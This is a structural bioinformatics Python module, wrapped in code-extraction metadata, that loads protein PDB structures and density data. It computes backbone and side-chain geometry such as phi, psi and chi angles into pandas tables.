matplotlib.pyplot as plt\n'), ((2295, 2356), 'matplotlib.pyplot.plot', 'plt.plot', (['sines', 'angled_torques', '"""-r"""'], {'label': '"""angled-torques"""'}), "(sines, angled_torques, '-r', label='angled-torques')\n", (2303, 2356), True, 'import matplotlib.pyplot as plt\n'), ((2357, 2420), 'matplotlib.pyplot.savefig', 'plt.savefig', (['"""angled_torques.pdf"""'], {'dpi': '(500)', 'bbox_inches': '"""tight"""'}), "('angled_torques.pdf', dpi=500, bbox_inches='tight')\n", (2368, 2420), True, 'import matplotlib.pyplot as plt\n'), ((2421, 2432), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (2430, 2432), True, 'import matplotlib.pyplot as plt\n'), ((1211, 1224), 'numpy.sin', 'np.sin', (['theta'], {}), '(theta)\n', (1217, 1224), True, 'import numpy as np\n'), ((422, 441), 'numpy.power', 'np.power', (['radius', '(2)'], {}), '(radius, 2)\n', (430, 441), True, 'import numpy as np\n')] |
#!/l_mnt/python/envs/teaching/bin/python3
#import Bio.PDB as bio
import pandas as pd
import numpy as np
import Geometry.GeoAtom as atm
import Geometry.GeoDensity as den
import Geometry.GeoCalcs as calcs
'''
singleton object to manage only loading pdbs once
https://python-3-patterns-idioms-test.readthedocs.io/en/latest/Singleton.html
'''
class GeoPdbs:
class __GeoPdbs:
def __init__(self,pdbDirectory,edDirectory,ed=True,dssp=True,keepDisordered=True,badAtoms=[]):
'''
:param pdbDirectory:
:param edDirectory:
:param ed:
:param dssp:
:param keepDisordered:
'''
self.pdbs = {}
self.pdbDirectory = pdbDirectory
self.edDirectory = edDirectory
self.ed = ed
self.dssp=dssp
self.keepDisordered = keepDisordered
self.badAtoms = badAtoms
def __getPdb__(self,pdbCode):
return self.pdbs[pdbCode]
def __existsPdb__(self,pdbCode):
return pdbCode in self.pdbs
def __addPdb__(self,pdbCode,pdb):
self.pdbs[pdbCode] = pdb
def __clear__(self):
self.pdbs.clear()
instance=None
def __init__(self,pdbDirectory,edDirectory,ed=True,dssp=True,keepDisordered=True,badAtoms=[]):
if not GeoPdbs.instance:
GeoPdbs.instance = GeoPdbs.__GeoPdbs(pdbDirectory,edDirectory,ed,dssp,keepDisordered,badAtoms)
#else:
# GeoPdbs.instance.pdbDirectory = pdbDirectory
# GeoPdbs.instance.edDirectory = edDirectory
# GeoPdbs.instance.ed = ed
# GeoPdbs.instance.dssp = dssp
def clear(self):
self.instance.__clear__()
GeoPdbs.instance = None
def existsPdb(self, pdbCode):
pdbCode = pdbCode.lower()
return self.instance.__existsPdb__(pdbCode)
def getPdb(self, pdbCode,useAll):
pdbCode = pdbCode.lower()
if self.instance.__existsPdb__(pdbCode):
return self.instance.__getPdb__(pdbCode)
else:
gp = GeoPdb(pdbCode,self.instance.pdbDirectory,self.instance.edDirectory,self.instance.ed,self.instance.dssp,self.instance.keepDisordered,self.instance.badAtoms,useAll)
self.instance.__addPdb__(pdbCode,gp)
return gp
class GeoPdb:
def __init__(self,pdbCode,pdbDataPath,edDataPath,ed,dssp,keepDisordered,badAtoms,useAll):
pdbCode = pdbCode.lower()
self.pdbCode = pdbCode
self.pdbDataPath= pdbDataPath
self.hasDensity = False
self.hasPDB = False
self.atoms = []
self.hetatms = []
self.water = []
self.densCSV = pd.DataFrame()
self.hasDssp = dssp
self.dataFrame = pd.DataFrame()
self.ghost = False
self.useAll = useAll
self.keepDisordered = keepDisordered
self.badAtoms = badAtoms
self.averageBfactor = 0
if self.pdbCode == 'ghost':
self.ghost = True
#self.pdbCode = '2q1j'
self.pdbCode = '4rek'
self.hasDensity = False
self.hasDssp = False
else:
if ed:
self.geoDen = den.GeoDensity(pdbCode, 'fifty', pdbDataPath, edDataPath)
self.hasDensity = self.geoDen.valid
else:
self.hasDensity = False
if self.__gatherAtoms():
if self.hasDssp:
self.__applyDssp()
#self.createDataStructure()
if self.ghost == True:
self.pdbCode = 'ghost'
def createDataStructure(self):
#print('PSU: create data structure',self.pdbCode)
dicdfs = []
for atom in self.atoms:
dic={ 'pdbCode':atom.values['pdbCode'],'resolution':atom.values['resolution'],
'chain':atom.values['chain'], 'rid':atom.values['rid'],'ridx':atom.values['ridx'],
'dssp':atom.values['dssp'], 'aa':atom.values['aa'],
'atom':atom.values['atom'], 'atomNo':atom.values['atomNo'],
'electrons':atom.values['electrons'], 'element':atom.values['element'],
'x':atom.values['x'], 'y':atom.values['y'], 'z':atom.values['z'],
'bfactor':atom.values['bfactor'], 'occupant':atom.values['occupant'],
'occupancy':atom.values['occupancy'],
'2FoFc':atom.values['2FoFc'], 'FoFc':atom.values['FoFc'],
'Fo':atom.values['Fo'], 'Fc':atom.values['Fc']}
dicdfs.append(dic)
self.dataFrame = pd.DataFrame.from_dict(dicdfs)
def getDataFrame(self):
#if self.dataFrame == None:
if self.dataFrame.empty:
self.createDataStructure()
return self.dataFrame
def getDensitySquare(self,squares,Fos,Fcs,interp,differ,degree):
xsq = squares[0]
ysq = squares[1]
zsq = squares[2]
x,y = xsq.shape
squ = np.zeros((x,y))
for i in range(0,x):
for j in range(0, y):
a,b,c = xsq[i,j],ysq[i,j],zsq[i,j]
den = self.geoDen.getInterpolatedDensity(a,b,c,Fos,Fcs,interp,differ,degree)
squ[i,j] = den
return squ
#########################################################################################################################
## PRIVATE FUNCTIONS FOR THE CLASS
#########################################################################################################################
def __gatherAtoms(self):
# try:
bfactorCount = 0
bfactorTotal = 0
if True:
import Bio.PDB as bio
self.hasPDB = True
pdbCode = self.pdbCode.lower()
#print('PSU: load from BioPython', self.pdbCode)
parser = bio.PDBParser()
biodl = bio.PDBList()
structure = None
gotPdb = False
try:
#print('debug get pdb from',self.pdbDataPath + 'pdb' + pdbCode + '.ent')
structure = parser.get_structure(pdbCode, self.pdbDataPath + 'pdb' + pdbCode + '.ent')
gotPdb = True
except:
if '_ADJ' not in self.pdbDataPath:#never download the pdb to an adjusted directory
import time
#print('!!! Downloading from pdb: ',self.pdbDataPath,pdbCode)
biodl.download_pdb_files([pdbCode], pdir=self.pdbDataPath, file_format='pdb')
time.sleep(1)
try:
structure = parser.get_structure(pdbCode, self.pdbDataPath + 'pdb' + pdbCode + '.ent')
gotPdb = True
except:
import time
time.sleep(10)
structure = parser.get_structure(pdbCode, self.pdbDataPath + 'pdb' + pdbCode + '.ent')
gotPdb = True
if gotPdb:
resolution = structure.header['resolution']
atomNo = 0
resnum = 1
for model in structure:
for chain in model:
for residue in chain:
r = residue.get_resname()
# print('Residue:', r)
rid = residue.get_full_id()[3][1]
chain = residue.get_full_id()[2]
hetatm = residue.get_full_id()[3][0]
ridx = resnum
resnum = resnum+1
#decision as to whether r is to be used. for density maps yes, for geoemtry no
#print(residue.get_full_id())
#print(r,hetatm)
if (r in self.getAAList() and 'H' not in hetatm) or self.useAll:# and r!='HOH'):# != 'HOH': # bio.is_aa(residue):
for atom in residue:
disordered = 'N'
useAtom = True
if atom.is_disordered():
disordered = 'Y'
if self.keepDisordered:
if atom.disordered_has_id("A"):
atom.disordered_select("A")
else:
useAtom = False
if not self.keepDisordered and useAtom:
if atom.get_occupancy() < 1:
useAtom = False
#print('debug not passed disordered', atom,atom.get_occupancy())
if useAtom:
atomID=atom.get_full_id()[0] +chain + str(rid) +atom.get_name()
if atomID in self.badAtoms:
#print(atomID)
useAtom = False
if useAtom:
oneAtom = atm.GeoAtom()
oneAtom.setStructureInfo(pdbCode, resolution)
oneAtom.setResidueInfo(chain, rid, ridx,r)
atomNo += 1
name = atom.get_name()
occupant = atom.get_full_id()[4][1]
if occupant == ' ':
occupant = 'A'
x = atom.get_vector()[0]
y = atom.get_vector()[1]
z = atom.get_vector()[2]
bfactor = atom.get_bfactor()
if name == 'CA':
bfactorCount += 1
bfactorTotal += bfactor
occupancy = atom.get_occupancy()
oneAtom.setAtomInfo(r,name, atomNo, x, y, z, bfactor, occupant, occupancy,disordered)
#if rid < 3:
# print(oneAtom)
# add density if we can
if self.hasDensity:
tFoFc, FoFc, Fo, Fc = self.geoDen.getDensityXYZ(x, y, z)
oneAtom.setDensityInfo(tFoFc, FoFc, Fo, Fc)
# print('Atom:',atomNo)
if r in self.getAAList():
self.atoms.append(oneAtom)
elif r == 'HOH':
self.water.append(oneAtom)
else:
self.hetatms.append(oneAtom)
if bfactorCount > 0:
self.averageBfactor = bfactorTotal/bfactorCount
# Now set the bFactorRatio for all atoms
for atom in self.atoms:
try:
atom.values['bfactorRatio'] = atom.values['bfactor'] / self.averageBfactor
except:
atom.values['bfactorRatio'] = 0
else:
self.averageBfactor = 0
#print('PSU: loaded successfully from BioPython', self.pdbCode)
self.hasPDB = True
else:
#print('!!! PSU: failed to load', self.pdbCode, 'from',self.pdbDataPath)
self.hasPDB = False
# except:
# self.hasPDB = False
return (self.hasPDB)
def __applyDssp(self):
import Bio.PDB as bio
print('PSU: applying dssp')
from Bio.PDB.DSSP import DSSP
p = bio.PDBParser()
pdbFile = self.pdbDataPath + 'pdb' + self.pdbCode + '.ent'
structure = p.get_structure(self.pdbCode, pdbFile)
model = structure[0]
dssp = DSSP(model, pdbFile)
for akey in list(dssp.keys()):
chain = akey[0]
res_no = akey[1][1]
row = dssp[akey]
ss = row[2]
for atom in self.atoms:
if atom.values['rid'] == res_no and atom.values['chain'] == chain:
atom.setDsspInfo(ss)
print('PSU: applied dssp successfully')
def getStructureDensity(self,allPoints,divisor,pdbDataPath,edDataPath):
if self.hasDensity:
if self.densCSV.empty:
self.geoDen = den.GeoDensity(self.pdbCode,'fifty',pdbDataPath,edDataPath)
self.densCSV = self.geoDen.getPeaks(allPoints,divisor)
return self.densCSV
def getGeoemtryCsv(self,geoListEntered, hues,bfactorFactor = -1,restrictedAa = 'ALL'):
#print('PSU Geometry csv for - ', self.pdbCode)
# geo in format C-1, C+1, C
#print('PSU: creating geometry dataframe')
dics = []
usingAliases = False
# remove anything that is in anyway
if 'rid' in hues:
hues.remove('rid')
if 'pdbCode' in hues:
hues.remove('pdbCode')
if 'chain' in hues:
hues.remove('chain')
geoList = []
geoListIn = []
#print('geos', geoListEntered)
for geoa in geoListEntered:
for aa in self.getAAList():
geo = self.aliasToGeo(geoa,aa)
if geo != geoa:
usingAliases = True
#print(geoa,geo,aa,usingAliases)
if ':' not in geo:
if geo not in hues:
hues.append(geo)
else:
if geo not in geoList:
geoList.append(geo)
if geoa not in geoListIn:
geoListIn.append(geoa)
if len(geoList)<2:
geoList.append('N:CA')
geoList.append('CA:C')
if len(geoListIn)<2:
geoListIn.append('N:CA')
geoListIn.append('CA:C')
if 'aa' not in hues:
hues.append('aa')
if 'ridx' not in hues:
hues.append('ridx')
if 'atomNo' not in hues:
hues.append('atomNo')
if 'bfactor' not in hues:
hues.append('bfactor')
occList = ['A']#self.__getOccList()
ridList = self.__getRidList()
chainList = self.__getChainList()
rows = len(ridList)
chrows = len(chainList)
occs = len(occList)
#an atom will be uniquely defined by rid, chain, occupant
# set up the geoData to which we concatenate first
#geoData = pd.DataFrame(columns=('pdbCode', 'chain', 'rid'))
#for hue in hues:
# geoData[hue] = np.nan
#for geo in geoListIn: #the column names will be the alias names or whatever we passed in AND the aliases
# geoData[geo] = np.nan
#for geo in geoList: #the column names will be the alias names or whatever we passed in AND the aliases
# geoData[geo] = np.nan
for ch in range(0, chrows):
thisChain = chainList[ch]
for occ in range(0,occs):
thisOcc = occList[occ]
thisOcc = occList[occ]
for rid in range(0, rows):
thisResid = ridList[rid]
thisResidue = self.__getResidue(thisChain, thisResid,thisOcc)# not really a residue but it does for getting aa
if thisResidue == None:
#print(thisChain,thisResid,thisOcc)
a = 2
elif restrictedAa != 'ALL' and restrictedAa != thisResidue.values['aa']:
#print('Skipping', thisResidue, restrictedAa)
a = 2
elif bfactorFactor != -1 and self.__getResidueBFactor(thisChain, thisResid,thisOcc) > self.averageBfactor * bfactorFactor:
# print(thisChain,thisResid,thisOcc)
a = 2
else:
allValid = True
aa = thisResidue.values['aa']
listCalcs = []
for geoa in geoListIn:
geo = self.aliasToGeo(geoa,aa)
geos = geo.split(':')
geoPairs = self.__geosToPairs(geos)
datasA = []
firstAtom = ''
for a in range(0, len(geoPairs)):
geoPair = geoPairs[a]
geoAtom = geoPair[0]
if firstAtom == '':
firstAtom = geoAtom
ridA = thisResid + geoPairs[a][1] # add the offset
atomA = self.__getAtom(thisChain, ridA,thisOcc,geoAtom)
if geoAtom == 'HOH':
atomA = self.__getWaterAtom(thisChain, ridA, thisOcc, firstAtom)
elif geoAtom == 'HETATM':
atomA = self.__getHetAtom(thisChain, ridA, thisOcc, firstAtom)
elif '{' in geoAtom and '}' in geoAtom:
atomA = self.__getNearestAtom(thisChain, ridA, thisOcc, firstAtom,geoAtom)
#elif '*' in geoAtom and '*' in geoAtom:
# atomA = self.__getNumberAtom(thisChain, ridA, thisOcc, firstAtom,geoAtom)
# There should be 1 atom
if atomA != None:
datasA.append(atomA)
else:
allValid = False
listCalcs.append([datasA,geo])
if allValid:
#add a new row to the dataframe
#df1 = pd.DataFrame([[np.nan] * len(geoData.columns)], columns=geoData.columns)
#geoData = df1.append(geoData, ignore_index=True)
thisRow = 0#len(geoData)-1
#geoData.loc[thisRow, 'pdbCode'] = self.pdbCode
#geoData.loc[thisRow, 'chain'] = thisChain
#geoData.loc[thisRow, 'rid'] = int(thisResid)
dic = {}
dic['pdbCode'] = self.pdbCode
dic['chain'] = thisChain
dic['rid'] = int(thisResid)
# add the main data to the data frame
reshues = {}
for hue in hues:
reshues[hue] = ''
for oneGeo in listCalcs:
datasA = oneGeo[0]
geo = oneGeo[1]
geoatoms = geo.split(':')
geoPairs = self.__geosToPairs([geoatoms])
gpCount = 0
for gp in geoPairs:
offset = geoPairs[0][1]
if offset == 0:
for hue in hues:
oneHue = datasA[gpCount].values[hue]
if reshues[hue] == '':
try:
float(oneHue)
reshues[hue] = 0
except:
reshues[hue] = oneHue
if len(datasA) == 4: # dihedral
valA = calcs.torsion(datasA[0].values['x'], datasA[0].values['y'], datasA[0].values['z'],
datasA[1].values['x'], datasA[1].values['y'], datasA[1].values['z'],
datasA[2].values['x'], datasA[2].values['y'], datasA[2].values['z'],
datasA[3].values['x'], datasA[3].values['y'], datasA[3].values['z'])
motif = datasA[0].values['residue']+datasA[1].values['residue']+datasA[2].values['residue']+datasA[3].values['residue']
avbf = (datasA[0].values['bfactor'] + datasA[1].values['bfactor'] + datasA[2].values['bfactor']+ datasA[3].values['bfactor']) / 4
ridmotif = str(datasA[0].values['rid']) + '_' + str(datasA[1].values['rid']) + '_' + str(datasA[2].values['rid']) + '_' + str(datasA[3].values['rid'])
atmmotif = str(datasA[0].values['atom']) + '_' + str(datasA[1].values['atom']) + '_' + str(datasA[2].values['atom']) + '_' + str(datasA[3].values['atom'])
for hue in hues:
aHue = datasA[0].values[hue]
bHue = datasA[0].values[hue]
cHue = datasA[0].values[hue]
dHue = datasA[0].values[hue]
try:
float(aHue)
thisHue = (aHue + bHue + cHue + dHue)/4
reshues[hue] += thisHue
if reshues[hue] != thisHue:
reshues[hue] = reshues[hue]/2 # we want the average of all the atoms in the calculation
except:
reshues[hue] =reshues[hue]
elif len(datasA) == 3: # angle
valA = calcs.angle(datasA[0].values['x'], datasA[0].values['y'], datasA[0].values['z'],
datasA[1].values['x'], datasA[1].values['y'], datasA[1].values['z'],
datasA[2].values['x'], datasA[2].values['y'], datasA[2].values['z'])
motif = datasA[0].values['residue'] + datasA[1].values['residue'] + datasA[2].values['residue']
avbf = (datasA[0].values['bfactor'] + datasA[1].values['bfactor']+ datasA[2].values['bfactor']) / 3
ridmotif = str(datasA[0].values['rid']) + '_' + str(datasA[1].values['rid']) + '_' + str(datasA[2].values['rid'])
atmmotif = str(datasA[0].values['atom']) + '_' + str(datasA[1].values['atom']) + '_' + str(datasA[2].values['atom'])
for hue in hues:
aHue = datasA[0].values[hue]
bHue = datasA[0].values[hue]
cHue = datasA[0].values[hue]
try:
float(aHue)
thisHue = (aHue + bHue + cHue)/3
reshues[hue] += thisHue
if reshues[hue] != thisHue:
reshues[hue] = reshues[hue]/2 # we want the average of all the atoms in the calculation
except:
reshues[hue] =reshues[hue]
elif len(datasA) == 2: # distance
valA = calcs.distance(datasA[0].values['x'], datasA[0].values['y'], datasA[0].values['z'],
datasA[1].values['x'], datasA[1].values['y'], datasA[1].values['z'])
motif = datasA[0].values['residue'] + datasA[1].values['residue']
avbf = (datasA[0].values['bfactor'] + datasA[1].values['bfactor'])/2
ridmotif = str(datasA[0].values['rid']) + "_" + str(datasA[1].values['rid'])
atmmotif = str(datasA[0].values['atom']) + "_" + str(datasA[1].values['atom'])
for hue in hues:
aHue = datasA[0].values[hue]
bHue = datasA[0].values[hue]
try:
float(aHue)
thisHue = (aHue + bHue)/2
reshues[hue] += thisHue
if reshues[hue] != thisHue:
reshues[hue] = reshues[hue]/2 # we want the average of all the atoms in the calculation
except:
reshues[hue] =reshues[hue]
else: # just some data
print('??',datasA)
#geoData.loc[thisRow, geo] = valA
dic[geo] = valA
dic[geo+'_motif'] = motif
dic[geo + '_avbfactor'] = avbf
dic[geo + '_ridmotif'] = ridmotif
dic[geo + '_atmmotif'] = atmmotif
# hue could be an average or an
for hue in hues:
#geoData.loc[thisRow, hue] = reshues[hue]
dic[hue] = reshues[hue]
dic['aa'] = aa
#print(usingAliases)
if usingAliases:
#aa = geoData['aa'][0]
geoa = self.geoToAlias(geo,aa)
#print(geoa,geo,aa)
if geoa != geo:
#geoData.loc[thisRow, geoa] = valA # we have alias and geo column
dic[geoa] = valA
dics.append(dic)
dataFrame = pd.DataFrame.from_dict(dics)
return dataFrame
def __getAtomsRid(self,rid,atoms):
newAtoms = []
for atm in atoms:
if atm.values['rid'] == rid:
newAtoms.append(atm)
return(newAtoms)
def __getAtomsChain(self, chain,atoms):
newAtoms = []
for atm in atoms:
if atm.values['chain'] == chain:# and atm.values['aa'] == aa:
newAtoms.append(atm)
return (newAtoms)
def __getAtomsOccupant(self, occ,atoms):
newAtoms = []
for atm in atoms:
if atm.values['occupant'] == occ:
newAtoms.append(atm)
return (newAtoms)
def __getAtomsAtom(self, atom,atoms):
newAtoms = []
for atm in atoms:
if atm.values['atom'] == atom:
newAtoms.append(atm)
return (newAtoms)
def __getResidue(self, chain, rid, occ):
for atm in self.atoms:
if atm.values['chain'] == chain and atm.values['rid'] == rid and atm.values['occupant'] == occ:
return atm
return None
def __getAtom(self, chain, rid, occ,atom):
# The atom number cannot be less than 1
if rid < 1:
return None
#it could be HOH ar HETATM
for atm in self.atoms:
if atm.values['chain'] == chain and atm.values['rid'] == rid and atm.values['occupant'] == occ and atm.values['atom'] == atom:
return atm
return None
def __getWaterAtom(self, chain, rid, occ,atom):
# The atom number cannot be less than 1
atm = self.__getAtom(chain, rid, occ,atom)
if atm == None:
return None
water = atm #return itself if there are none
dis = 1000
for hoh in self.water:
valDis = calcs.distance(atm.values['x'], atm.values['y'], atm.values['z'],
hoh.values['x'], hoh.values['y'], hoh.values['z'])
if valDis < dis:
dis = valDis
water = hoh
return water
def __getHetAtom(self, chain, rid, occ,atom):
# The atom number cannot be less than 1
atm = self.__getAtom(chain, rid, occ,atom)
if atm == None:
return None
hetatm = atm #return itself if there are none
dis = 1000
for het in self.hetatms:
valDis = calcs.distance(atm.values['x'], atm.values['y'], atm.values['z'],
het.values['x'], het.values['y'], het.values['z'])
if valDis < dis:
dis = valDis
hetatm = het
return hetatm
def __getNearestAtom(self, chain, rid, occ,atom,newatom):
# The atom number cannot be less than 1
atm = self.__getAtom(chain, rid, occ,atom)
if atm == None:
return None
nearatm = atm #return itself if there are none
dis = 1000
for at in self.atoms:
#print("," + at.values['atom'] + ",", newatom)
if "," + at.values['atom'] + "," in newatom and at.values['rid'] != rid and at.values['rid'] != rid-1 and at.values['rid'] != rid+1: #could pass in a list of atoms to look for in the case of oxygen sidechains
#print("," + at.values['atom'] + ",", newatom)
valDis = calcs.distance(atm.values['x'], atm.values['y'], atm.values['z'], at.values['x'], at.values['y'], at.values['z'])
if valDis < dis:
dis = valDis
nearatm = at
if ",HOH," in newatom:
for hoh in self.water:
valDis = calcs.distance(atm.values['x'], atm.values['y'], atm.values['z'], hoh.values['x'], hoh.values['y'], hoh.values['z'])
if valDis < dis:
dis = valDis
nearatm = hoh
if ",HETATM," in newatom:
for het in self.hetatms:
valDis = calcs.distance(atm.values['x'], atm.values['y'], atm.values['z'], het.values['x'], het.values['y'], het.values['z'])
if valDis < dis:
dis = valDis
nearatm = het
return nearatm
def __getNumberAtom(self, chain, rid, occ,atom,newatom):
# The atom number cannot be less than 1
atm = self.__getAtom(chain, rid, occ,atom)
if atm == None:
return None
nearatm = atm #return itself if there are none
dis = 4
count = 0
for at in self.atoms:
#print("," + at.values['atom'] + ",", newatom)
if "," + at.values['atom'] + "," in newatom and at.values['rid'] != rid and at.values['rid'] != rid-1 and at.values['rid'] != rid+1: #could pass in a list of atoms to look for in the case of oxygen sidechains
#print("," + at.values['atom'] + ",", newatom)
valDis = calcs.distance(atm.values['x'], atm.values['y'], atm.values['z'], at.values['x'], at.values['y'], at.values['z'])
if valDis < dis:
count +=1
if ",HOH," in newatom:
for hoh in self.water:
valDis = calcs.distance(atm.values['x'], atm.values['y'], atm.values['z'], hoh.values['x'], hoh.values['y'], hoh.values['z'])
if valDis < dis:
count +=1
if ",HETATM," in newatom:
for het in self.hetatms:
valDis = calcs.distance(atm.values['x'], atm.values['y'], atm.values['z'], het.values['x'], het.values['y'], het.values['z'])
if valDis < dis:
count += 1
return count
def __getResidueBFactor(self, chain, rid, occ):
# The atom number cannot be less than 1
for atm in self.atoms:
if atm.values['chain'] == chain and atm.values['rid'] == rid and atm.values['occupant'] == occ and atm.values['atom'] == 'CA':
return atm.values['bfactor']
return 0
def __getChainsUnique(self, atoms):
chains = []
for atm in atoms:
if atm.values['chain'] not in chains:
chains.append(atm.values['chain'])
return (chains)
def __getChainList(self):
chains = []
for atm in self.atoms:
if atm.values['chain'] not in chains:
chains.append(atm.values['chain'])
return (chains)
def __getRidList(self):
rids = []
for atm in self.atoms:
if atm.values['rid'] not in rids:
rids.append(atm.values['rid'])
return (rids)
def __getOccList(self):
occs = []
for atm in self.atoms:
if atm.values['occupant'] not in occs:
occs.append(atm.values['occupant'])
return (occs)
def __getRidUnique(self, atoms):
vals = []
for atm in atoms:
if atm.values['rid'] not in vals:
vals.append(atm.values['rid'])
print(vals)
return (vals)
def __geosToPairs(self,geos):
# geoX in format C-1, C+1, C
pairs = []
for geo in geos:
atomX = ''
offX = ''
pm = 0
for alpha in geo:
if alpha == '-':
pm = -1
elif alpha == '+':
pm = 1
elif pm == 0:
atomX += alpha
else: # it is a number offset
offX += alpha
if pm != 0:
offX = pm * int(offX)
else:
offX = 0
pairs.append([atomX, offX])
return (pairs)
def aliasToGeo(self,alias,aa):
dic = self.getAliasDictionary()
if alias + '_' + aa in dic:
return dic[alias+'_'+aa]
elif alias in dic:
return dic[alias]
else:
return alias
def geoToAlias(self,geo,aa):
dic = self.getAliasDictionary()
for a,g in dic.items():
if aa in a and g == geo:
if '_' in a:
return a.split('_')[0]
else:
return a
for a,g in dic.items():
if g==geo:
return a
return geo
def getAliasDictionary(self):
return {
'PHI':'C-1:N:CA:C',
'PSI':'N:CA:C:N+1',
'OMEGA': 'CA:C:N+1:CA+1',
'PREOMEGA': 'CA-1:C-1:N:CA',
'TAU':'N:CA:C',
'TAU-1': 'C-1:N:CA',
'TAU+1': 'CA:C:N+1',
'CHI1':'N:CA:CB:CG',
'CHI1_ILE':'N:CA:CB:CG1',
'CHI1_SER': 'N:CA:CB:OG',
'CHI1_THR': 'N:CA:CB:OG1',
'CHI1_VAL': 'N:CA:CB:CG1',
'CHI1_ALA': 'N:CA:CB:HB1',
'CHI2': 'CA:CB:CG:CD',
'CHI2_ASN': 'CA:CB:CG:OD1',
'CHI2_ASP': 'CA:CB:CG:OD1',
'CHI2_HIS': 'CA:CB:CG:ND1',
'CHI2_ILE': 'CA:CB:CG1:CD',
'CHI2_LEU': 'CA:CB:CG:CD1',
'CHI2_MET': 'CA:CB:CG:SD',
'CHI2_PHE': 'CA:CB:CG:CD1',
'CHI2_TRP': 'CA:CB:CG:CD1',
'CHI2_TYR': 'CA:CB:CG:CD1',
'CHI2_VAL': 'CA:CB:CG1:HG11',
'CHI2_THR': 'CA:CB:CG2:HG21',
'CHI3':'CB:CG:CD:CE',
'CHI3_ARG': 'CB:CG:CD:NE',
'CHI3_GLN': 'CB:CG:CD:OE1',
'CHI3_GLU': 'CB:CG:CD:OE1',
'CHI3_HIS': 'CA:CB:CG:CD2',
'CHI3_MET': 'CB:CG:SD:CE',
'CHI3_PRO': 'CB:CG:CD:N',
'CHI3_VAL': 'CA:CB:CG2:HG21',
'CHI4': 'CG:CD:CE:CZ',
'CHI4_ARG': 'CG:CD:NE:CZ',
'CHI4_PRO': 'CG:CD:N:CA',
'CHI4_LYS': 'CG:CD:CE:NZ',
'CHI5': 'CD:CE:CZ:NH1',
'CHI5_PRO': 'CD:N:CA:CB',
}
def getAAList(self):
return ['ALA','CYS','ASP','GLU','PHE',
'GLY','HIS','ILE','LYS','LEU',
'MET','ASN','PRO','GLN','ARG',
'SER','THR','VAL','TRP','TYR']
| [
"pandas.DataFrame",
"pandas.DataFrame.from_dict",
"Bio.PDB.PDBList",
"Geometry.GeoDensity.GeoDensity",
"Geometry.GeoCalcs.torsion",
"numpy.zeros",
"Bio.PDB.DSSP.DSSP",
"Geometry.GeoCalcs.distance",
"time.sleep",
"Geometry.GeoCalcs.angle",
"Bio.PDB.PDBParser",
"Geometry.GeoAtom.GeoAtom"
] | [((2699, 2713), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (2711, 2713), True, 'import pandas as pd\n'), ((2767, 2781), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (2779, 2781), True, 'import pandas as pd\n'), ((4612, 4642), 'pandas.DataFrame.from_dict', 'pd.DataFrame.from_dict', (['dicdfs'], {}), '(dicdfs)\n', (4634, 4642), True, 'import pandas as pd\n'), ((4993, 5009), 'numpy.zeros', 'np.zeros', (['(x, y)'], {}), '((x, y))\n', (5001, 5009), True, 'import numpy as np\n'), ((12357, 12372), 'Bio.PDB.PDBParser', 'bio.PDBParser', ([], {}), '()\n', (12370, 12372), True, 'import Bio.PDB as bio\n'), ((12543, 12563), 'Bio.PDB.DSSP.DSSP', 'DSSP', (['model', 'pdbFile'], {}), '(model, pdbFile)\n', (12547, 12563), False, 'from Bio.PDB.DSSP import DSSP\n'), ((27482, 27510), 'pandas.DataFrame.from_dict', 'pd.DataFrame.from_dict', (['dics'], {}), '(dics)\n', (27504, 27510), True, 'import pandas as pd\n'), ((5864, 5879), 'Bio.PDB.PDBParser', 'bio.PDBParser', ([], {}), '()\n', (5877, 5879), True, 'import Bio.PDB as bio\n'), ((5900, 5913), 'Bio.PDB.PDBList', 'bio.PDBList', ([], {}), '()\n', (5911, 5913), True, 'import Bio.PDB as bio\n'), ((29309, 29430), 'Geometry.GeoCalcs.distance', 'calcs.distance', (["atm.values['x']", "atm.values['y']", "atm.values['z']", "hoh.values['x']", "hoh.values['y']", "hoh.values['z']"], {}), "(atm.values['x'], atm.values['y'], atm.values['z'], hoh.\n values['x'], hoh.values['y'], hoh.values['z'])\n", (29323, 29430), True, 'import Geometry.GeoCalcs as calcs\n'), ((29895, 30016), 'Geometry.GeoCalcs.distance', 'calcs.distance', (["atm.values['x']", "atm.values['y']", "atm.values['z']", "het.values['x']", "het.values['y']", "het.values['z']"], {}), "(atm.values['x'], atm.values['y'], atm.values['z'], het.\n values['x'], het.values['y'], het.values['z'])\n", (29909, 30016), True, 'import Geometry.GeoCalcs as calcs\n'), ((3216, 3273), 'Geometry.GeoDensity.GeoDensity', 'den.GeoDensity', (['pdbCode', '"""fifty"""', 'pdbDataPath', 'edDataPath'], {}), "(pdbCode, 'fifty', pdbDataPath, edDataPath)\n", (3230, 3273), True, 'import Geometry.GeoDensity as den\n'), ((13095, 13157), 'Geometry.GeoDensity.GeoDensity', 'den.GeoDensity', (['self.pdbCode', '"""fifty"""', 'pdbDataPath', 'edDataPath'], {}), "(self.pdbCode, 'fifty', pdbDataPath, edDataPath)\n", (13109, 13157), True, 'import Geometry.GeoDensity as den\n'), ((30841, 30959), 'Geometry.GeoCalcs.distance', 'calcs.distance', (["atm.values['x']", "atm.values['y']", "atm.values['z']", "at.values['x']", "at.values['y']", "at.values['z']"], {}), "(atm.values['x'], atm.values['y'], atm.values['z'], at.values\n ['x'], at.values['y'], at.values['z'])\n", (30855, 30959), True, 'import Geometry.GeoCalcs as calcs\n'), ((31146, 31267), 'Geometry.GeoCalcs.distance', 'calcs.distance', (["atm.values['x']", "atm.values['y']", "atm.values['z']", "hoh.values['x']", "hoh.values['y']", "hoh.values['z']"], {}), "(atm.values['x'], atm.values['y'], atm.values['z'], hoh.\n values['x'], hoh.values['y'], hoh.values['z'])\n", (31160, 31267), True, 'import Geometry.GeoCalcs as calcs\n'), ((31460, 31581), 'Geometry.GeoCalcs.distance', 'calcs.distance', (["atm.values['x']", "atm.values['y']", "atm.values['z']", "het.values['x']", "het.values['y']", "het.values['z']"], {}), "(atm.values['x'], atm.values['y'], atm.values['z'], het.\n values['x'], het.values['y'], het.values['z'])\n", (31474, 31581), True, 'import Geometry.GeoCalcs as calcs\n'), ((32399, 32517), 'Geometry.GeoCalcs.distance', 'calcs.distance', (["atm.values['x']", "atm.values['y']", "atm.values['z']", "at.values['x']", "at.values['y']", "at.values['z']"], {}), "(atm.values['x'], atm.values['y'], atm.values['z'], at.values\n ['x'], at.values['y'], at.values['z'])\n", (32413, 32517), True, 'import Geometry.GeoCalcs as calcs\n'), ((32668, 32789), 'Geometry.GeoCalcs.distance', 